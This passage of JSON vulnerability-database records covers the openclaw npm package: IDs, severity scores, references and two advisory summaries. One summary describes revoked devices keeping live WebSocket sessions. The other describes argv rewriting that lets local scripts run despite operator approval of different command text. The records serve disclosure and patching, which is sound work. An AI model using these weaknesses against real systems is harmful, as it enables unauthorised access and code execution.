,{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-34508","GHSA-8288-jpqp-95fx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gv2d-gfs7-gfh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91842?format=json","vulnerability_id":"VCID-gvam-2net-8kc5","summary":"OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n## Summary\n\nRemoving a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions.\n\n## Impact\n\nA revoked device could continue using its existing live session until reconnect, extending access beyond credential removal.\n\n## Affected Component\n\n`src/gateway/server-methods/devices.ts, src/gateway/server.impl.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01851","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01855","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02731","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34503"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"},{"reference_url":"https://github.com/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"GHSA-2pr2-hcv6-7gwv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2pr2-hcv6-7gwv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-34503","GHSA-2pr2-hcv6-7gwv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gvam-2net-8kc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90870?format=json","vulnerability_id":"VCID-h3yu-7bfc-vqhz","summary":"Duplicate Advisory: OpenClaw's Node system.run approval hardening wrapper semantic drift can execute unintended local scripts\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3rm-6x7g-882f. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw 2026.3.1 contains an approval integrity vulnerability in system.run node-host execution where argv rewriting changes command semantics. Attackers can place malicious local scripts in the working directory to execute unintended code despite operator approval of different command text.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608","reference_id":"CVE-2026-29608","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608"},{"reference_url":"https://github.com/advisories/GHSA-g87j-gm7p-6vw2","reference_id":"GHSA-g87j-gm7p-6vw2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g87j-gm7p-6vw2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/978873?format=json","purl":"pkg:npm/openclaw@2026.3.2-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulne